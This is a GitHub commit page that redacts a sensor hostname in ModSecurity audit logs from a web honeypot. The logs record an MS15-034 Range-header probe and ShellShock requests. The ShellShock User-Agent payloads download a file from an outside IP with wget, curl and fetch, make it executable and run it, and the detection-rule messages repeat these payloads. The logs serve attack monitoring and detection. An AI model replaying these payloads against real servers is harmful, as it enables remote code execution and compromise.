Skip to content

Commit

Permalink
* Updated REDACTED honeypot sensor string
Browse files Browse the repository at this point in the history
  • Loading branch information
Ryan Barnett committed Apr 16, 2015
1 parent 166db60 commit ac288c5
Show file tree
Hide file tree
Showing 3 changed files with 17 additions and 17 deletions.
4 changes: 2 additions & 2 deletions CVE-2015-1635/VS-Ton8AAQEAAF5AQyUAAAAE-A
Original file line number Diff line number Diff line change
Expand Up @@ -5,7 +5,7 @@ GET / HTTP/1.1
User-Agent: Wget/1.16.1 (cygwin)
Accept: */*
Accept-Encoding: identity
Host: honeypot-sensor:8080
Host: REDACTED_HONEYPOT_SENSOR:8080
Connection: Keep-Alive
Range: 0-18446744073709551615

Expand All @@ -22,7 +22,7 @@ Connection: Keep-Alive
Content-Type: text/html

--VS-Ton8AAQEAAF5AQyUAAAAE-H--
Message: Warning. String match "18446744073709551615" at REQUEST_HEADERS:Range. [file "remote server"] [line "-1"] [id "999013"] [msg "MS15-034 PoC Requests"] [data "0-18446744073709551615"] [tag "Host: honeypot-sensor:8080"]
Message: Warning. String match "18446744073709551615" at REQUEST_HEADERS:Range. [file "remote server"] [line "-1"] [id "999013"] [msg "MS15-034 PoC Requests"] [data "0-18446744073709551615"] [tag "Host: REDACTED_HONEYPOT_SENSOR:8080"]
Stopwatch: 1429197730818688 4086 (- - -)
Stopwatch2: 1429197730818688 4086; combined=2391, p1=278, p2=1693, p3=2, p4=307, p5=110, sr=118, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Expand Down
14 changes: 7 additions & 7 deletions ShellShock-Worm/VSYul38AAQEAAB@4xxMAAAAI
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@ Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* ");'
Host: honeypot-sensor
Host: REDACTED_HONEYPOT_SENSOR
Connection: Close

--VSYul38AAQEAAB@4xxMAAAAI-E--
Expand All @@ -25,12 +25,12 @@ Connection: close
Content-Type: text/html; charset=iso-8859-1

--VSYul38AAQEAAB@4xxMAAAAI-H--
Message: Warning. String match "() {" at REQUEST_HEADERS:User-Agent. [file "remote server"] [line "-1"] [id "2100080"] [msg "SLR: Bash ENV Variable Injection Attack"] [tag "Host: honeypot-sensor"] [tag "CVE-2014-6271"] [tag "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271"] [tag "https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/"]
Message: Warning. Operator EQ matched 1 at IP:block. [file "/opt/wasc-honeypot/etc/crs/rules/REQUEST-10-IP-REPUTATION.conf"] [line "31"] [id "981140"] [msg "Request from Known Malicious Client (Based on previous traffic violations)."] [data "Previous Block Reason: Request Indicates a Security Scanner Scanned the Site"] [severity "CRITICAL"] [tag "Host: honeypot-sensor"] [tag "IP_REPUTATION/MALICIOUS_CLIENT"]
Message: Warning. Matched phrase "LWP" at REQUEST_HEADERS:User-Agent. [file "/opt/wasc-honeypot/etc/crs/rules/REQUEST-13-SCANNER-DETECTION.conf"] [line "39"] [id "990002"] [rev "2"] [msg "Request Indicates a Security Scanner Scanned the Site"] [data "Matched Data: LWP found within REQUEST_HEADERS:User-Agent: () { :;};/usr/bin/perl -e 'print \x22content-type: text/plain\x5cr\x5cn\x5cr\x5cnxsuccess!\x22;system(\x22cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -o http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* \x22);'"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "Host: honeypot-sensor"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"]
Message: Warning. Operator EQ matched 1 at IP:block. [file "/opt/wasc-honeypot/etc/crs/rules/REQUEST-49-BLOCKING-EVALUATION.conf"] [line "26"] [id "981175"] [msg "Request Denied by IP Reputation Enforcement."] [data "Previous Block Reason: Request Indicates a Security Scanner Scanned the Site"] [severity "CRITICAL"] [tag "Host: honeypot-sensor"]
Message: Warning. Operator GE matched 5 at TX:anomaly_score. [file "/opt/wasc-honeypot/etc/crs/rules/REQUEST-49-BLOCKING-EVALUATION.conf"] [line "191"] [id "981176"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10, Last Matched Message: Request Indicates a Security Scanner Scanned the Site"] [severity "CRITICAL"] [tag "Host: honeypot-sensor"]
Message: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/opt/wasc-honeypot/etc/crs/rules/RESPONSE-80-CORRELATION.conf"] [line "67"] [id "981204"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10): Request Indicates a Security Scanner Scanned the Site"] [tag "Host: honeypot-sensor"]
Message: Warning. String match "() {" at REQUEST_HEADERS:User-Agent. [file "remote server"] [line "-1"] [id "2100080"] [msg "SLR: Bash ENV Variable Injection Attack"] [tag "Host: REDACTED_HONEYPOT_SENSOR"] [tag "CVE-2014-6271"] [tag "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271"] [tag "https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/"]
Message: Warning. Operator EQ matched 1 at IP:block. [file "/opt/wasc-honeypot/etc/crs/rules/REQUEST-10-IP-REPUTATION.conf"] [line "31"] [id "981140"] [msg "Request from Known Malicious Client (Based on previous traffic violations)."] [data "Previous Block Reason: Request Indicates a Security Scanner Scanned the Site"] [severity "CRITICAL"] [tag "Host: REDACTED_HONEYPOT_SENSOR"] [tag "IP_REPUTATION/MALICIOUS_CLIENT"]
Message: Warning. Matched phrase "LWP" at REQUEST_HEADERS:User-Agent. [file "/opt/wasc-honeypot/etc/crs/rules/REQUEST-13-SCANNER-DETECTION.conf"] [line "39"] [id "990002"] [rev "2"] [msg "Request Indicates a Security Scanner Scanned the Site"] [data "Matched Data: LWP found within REQUEST_HEADERS:User-Agent: () { :;};/usr/bin/perl -e 'print \x22content-type: text/plain\x5cr\x5cn\x5cr\x5cnxsuccess!\x22;system(\x22cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -o http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* \x22);'"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "Host: REDACTED_HONEYPOT_SENSOR"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"]
Message: Warning. Operator EQ matched 1 at IP:block. [file "/opt/wasc-honeypot/etc/crs/rules/REQUEST-49-BLOCKING-EVALUATION.conf"] [line "26"] [id "981175"] [msg "Request Denied by IP Reputation Enforcement."] [data "Previous Block Reason: Request Indicates a Security Scanner Scanned the Site"] [severity "CRITICAL"] [tag "Host: REDACTED_HONEYPOT_SENSOR"]
Message: Warning. Operator GE matched 5 at TX:anomaly_score. [file "/opt/wasc-honeypot/etc/crs/rules/REQUEST-49-BLOCKING-EVALUATION.conf"] [line "191"] [id "981176"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10, Last Matched Message: Request Indicates a Security Scanner Scanned the Site"] [severity "CRITICAL"] [tag "Host: REDACTED_HONEYPOT_SENSOR"]
Message: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/opt/wasc-honeypot/etc/crs/rules/RESPONSE-80-CORRELATION.conf"] [line "67"] [id "981204"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10): Request Indicates a Security Scanner Scanned the Site"] [tag "Host: REDACTED_HONEYPOT_SENSOR"]
Apache-Error: [file "core.c"] [line 3650] [level 3] File does not exist: /opt/wasc-honeypot/httpd/htdocs/cgi-bin
Stopwatch: 1428565655319556 3241 (- - -)
Stopwatch2: 1428565655319556 3241; combined=2251, p1=167, p2=1463, p3=1, p4=298, p5=231, sr=111, sw=91, l=0, gc=0
Expand Down
16 changes: 8 additions & 8 deletions ShellShock-Worm/VSagh38AAQEAAB@BMFUAAAAC
Original file line number Diff line number Diff line change
@@ -1,12 +1,12 @@
--VSagh38AAQEAAB@BMFUAAAAC-A--
[09/Apr/2015:15:53:43 +0000] VSagh38AAQEAAB@BMFUAAAAC 74.208.47.19 39498 honeypot-sensor 80
[09/Apr/2015:15:53:43 +0000] VSagh38AAQEAAB@BMFUAAAAC 74.208.47.19 39498 REDACTED_HONEYPOT_SENSOR 80
--VSagh38AAQEAAB@BMFUAAAAC-B--
GET /cgi-bin/main.cgi HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* ");'
Host: honeypot-sensor
Host: REDACTED_HONEYPOT_SENSOR
Connection: Close

--VSagh38AAQEAAB@BMFUAAAAC-E--
Expand All @@ -25,12 +25,12 @@ Connection: close
Content-Type: text/html; charset=iso-8859-1

--VSagh38AAQEAAB@BMFUAAAAC-H--
Message: Warning. String match "() {" at REQUEST_HEADERS:User-Agent. [file "remote server"] [line "-1"] [id "2100080"] [msg "SLR: Bash ENV Variable Injection Attack"] [tag "Host: honeypot-sensor"] [tag "CVE-2014-6271"] [tag "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271"] [tag "https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/"]
Message: Warning. Operator EQ matched 1 at IP:block. [file "/opt/wasc-honeypot/etc/crs/rules/REQUEST-10-IP-REPUTATION.conf"] [line "31"] [id "981140"] [msg "Request from Known Malicious Client (Based on previous traffic violations)."] [data "Previous Block Reason: Request Indicates a Security Scanner Scanned the Site"] [severity "CRITICAL"] [tag "Host: honeypot-sensor"] [tag "IP_REPUTATION/MALICIOUS_CLIENT"]
Message: Warning. Matched phrase "LWP" at REQUEST_HEADERS:User-Agent. [file "/opt/wasc-honeypot/etc/crs/rules/REQUEST-13-SCANNER-DETECTION.conf"] [line "39"] [id "990002"] [rev "2"] [msg "Request Indicates a Security Scanner Scanned the Site"] [data "Matched Data: LWP found within REQUEST_HEADERS:User-Agent: () { :;};/usr/bin/perl -e 'print \x22content-type: text/plain\x5cr\x5cn\x5cr\x5cnxsuccess!\x22;system(\x22cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -o http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* \x22);'"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "Host: honeypot-sensor"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"]
Message: Warning. Operator EQ matched 1 at IP:block. [file "/opt/wasc-honeypot/etc/crs/rules/REQUEST-49-BLOCKING-EVALUATION.conf"] [line "26"] [id "981175"] [msg "Request Denied by IP Reputation Enforcement."] [data "Previous Block Reason: Request Indicates a Security Scanner Scanned the Site"] [severity "CRITICAL"] [tag "Host: honeypot-sensor"]
Message: Warning. Operator GE matched 5 at TX:anomaly_score. [file "/opt/wasc-honeypot/etc/crs/rules/REQUEST-49-BLOCKING-EVALUATION.conf"] [line "191"] [id "981176"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10, Last Matched Message: Request Indicates a Security Scanner Scanned the Site"] [severity "CRITICAL"] [tag "Host: honeypot-sensor"]
Message: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/opt/wasc-honeypot/etc/crs/rules/RESPONSE-80-CORRELATION.conf"] [line "67"] [id "981204"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10): Request Indicates a Security Scanner Scanned the Site"] [tag "Host: honeypot-sensor"]
Message: Warning. String match "() {" at REQUEST_HEADERS:User-Agent. [file "remote server"] [line "-1"] [id "2100080"] [msg "SLR: Bash ENV Variable Injection Attack"] [tag "Host: REDACTED_HONEYPOT_SENSOR"] [tag "CVE-2014-6271"] [tag "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271"] [tag "https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/"]
Message: Warning. Operator EQ matched 1 at IP:block. [file "/opt/wasc-honeypot/etc/crs/rules/REQUEST-10-IP-REPUTATION.conf"] [line "31"] [id "981140"] [msg "Request from Known Malicious Client (Based on previous traffic violations)."] [data "Previous Block Reason: Request Indicates a Security Scanner Scanned the Site"] [severity "CRITICAL"] [tag "Host: REDACTED_HONEYPOT_SENSOR"] [tag "IP_REPUTATION/MALICIOUS_CLIENT"]
Message: Warning. Matched phrase "LWP" at REQUEST_HEADERS:User-Agent. [file "/opt/wasc-honeypot/etc/crs/rules/REQUEST-13-SCANNER-DETECTION.conf"] [line "39"] [id "990002"] [rev "2"] [msg "Request Indicates a Security Scanner Scanned the Site"] [data "Matched Data: LWP found within REQUEST_HEADERS:User-Agent: () { :;};/usr/bin/perl -e 'print \x22content-type: text/plain\x5cr\x5cn\x5cr\x5cnxsuccess!\x22;system(\x22cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -o http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* \x22);'"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "Host: REDACTED_HONEYPOT_SENSOR"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"]
Message: Warning. Operator EQ matched 1 at IP:block. [file "/opt/wasc-honeypot/etc/crs/rules/REQUEST-49-BLOCKING-EVALUATION.conf"] [line "26"] [id "981175"] [msg "Request Denied by IP Reputation Enforcement."] [data "Previous Block Reason: Request Indicates a Security Scanner Scanned the Site"] [severity "CRITICAL"] [tag "Host: REDACTED_HONEYPOT_SENSOR"]
Message: Warning. Operator GE matched 5 at TX:anomaly_score. [file "/opt/wasc-honeypot/etc/crs/rules/REQUEST-49-BLOCKING-EVALUATION.conf"] [line "191"] [id "981176"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10, Last Matched Message: Request Indicates a Security Scanner Scanned the Site"] [severity "CRITICAL"] [tag "Host: REDACTED_HONEYPOT_SENSOR"]
Message: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/opt/wasc-honeypot/etc/crs/rules/RESPONSE-80-CORRELATION.conf"] [line "67"] [id "981204"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10): Request Indicates a Security Scanner Scanned the Site"] [tag "Host: REDACTED_HONEYPOT_SENSOR"]
Apache-Error: [file "core.c"] [line 3650] [level 3] File does not exist: /opt/wasc-honeypot/httpd/htdocs/cgi-bin
Stopwatch: 1428594823855316 3435 (- - -)
Stopwatch2: 1428594823855316 3435; combined=2483, p1=199, p2=1565, p3=2, p4=354, p5=277, sr=77, sw=86, l=0, gc=0
Expand Down

0 comments on commit ac288c5

Please sign in to comment.